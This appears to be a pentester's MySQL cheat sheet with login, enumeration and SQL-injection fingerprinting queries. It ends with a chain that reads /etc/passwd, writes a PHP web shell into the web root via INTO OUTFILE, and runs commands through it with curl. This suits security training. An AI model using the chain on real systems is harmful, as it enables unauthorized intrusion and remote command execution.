MySQL

Database > Schema > Table > Column > Value

Dangerous Settings
SettingsDescription
userSets which user the MySQL service will run as.
passwordSets the password for the MySQL user.
admin_addressThe IP address on which to listen for TCP/IP connections on the administrative network interface.
debugThis variable indicates the current debugging settings
sql_warningsThis variable controls whether single-row INSERT statements produce an information string if warnings occur.
secure_file_privThis variable is used to limit the effect of data import and export operations.
# Login
# - try "root"
mysql -u <USER> -h <TARGET>
mysql -u <USER> --password=<PASSWORD> -P <PORT> -h <TARGET>

sqlmap’s query data has a lot of good example commands for enumeration:

-- Show Version
SELECT @@version ;
SELECT version() ;

-- Show User
SELECT USER()
SELECT CURRENT_USER()
SELECT user from mysql.user

SHOW databases ;
SHOW grants ;

-- Show if user is privileged
SELECT super_priv FROM mysql.user
SELECT super_priv FROM mysql.user WHERE user="root"

-- Show user permissions
SELECT grantee,privilege_type FROM information_schema.user_privileges
SELECT grantee,privilege_type FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"
-- look for interesting perms like "FILE" to read/write files

-- Tables and metadata
USE sys ;
SELECT host,unique_users FROM sys.host_summary ;

USE <DATABASE> ;
SHOW tables ;
DESCRIBE <TABLE> ;

-- Write data
INSERT INTO <TABLE> VALUES (<COL1_VAL>, <COL2_VAL>, <COL3_VAL>, ...);

-- Get data
SELECT * FROM <TABLE> WHERE <COLUMN> = "<VALUE>" ;
# WHERE x LIKE "%blah%" ;
SELECT * FROM <TABLE> WHERE <COLUMN> LIKE "%<VALUE>%" ORDER BY <COLUMN> ASC|DESC LIMIT <NUM> ;

-- Example COUNT
SELECT COUNT(*) FROM <TABLE> WHERE <COLUMN1> > 10000 OR <COLUMN2> NOT LIKE '%<KEYWORD>%' ;

Enumeration

MySQL

These commands are specific though not necessarily exclusive to MySQL

PayloadWhen to UseExpected OutputWrong Output
SELECT @@versionWhen we have full query outputMySQL Version ‘i.e. 10.3.22-MariaDB-1ubuntu1In MSSQL it returns MSSQL version. Error with other DBMS.
SELECT POW(1,1)When we only have numeric output1Error with other DBMS
SELECT SLEEP(5)Blind/No OutputDelays page response for 5 seconds and returns 0.Will not delay response with other DBMS
# Show currently used database (if inside a query)
SHOW database()

USE information_schema ;  # metadata

# Get database names
SELECT schema_name FROM information_schema.schemata ;

# Show tables
SELECT table_name,table_schema FROM information_schema.tables where table_schema='<DATABASE>' ;

# Get columns
select COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='<TABLE>' ;

# Finally read values
SELECT <COLUMN> FROM <DATABASE>.<TABLE> ;

Read Files

-- Read Files
SELECT LOAD_FILE("/etc/passwd") ;

Write Files

  1. User with FILE privilege enabled
  2. MySQL global secure_file_priv variable not enabled
  3. Write access to the location we want to write to on the back-end server
-- Write Files
SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"
-- For 4 columns
SELECT "","<?php system($_REQUEST[0]); ?>","","" INTO OUTFILE '/var/www/html/webshell.php';
curl -o- 'http://<TARGET>/webshell.php?0=<COMMAND>'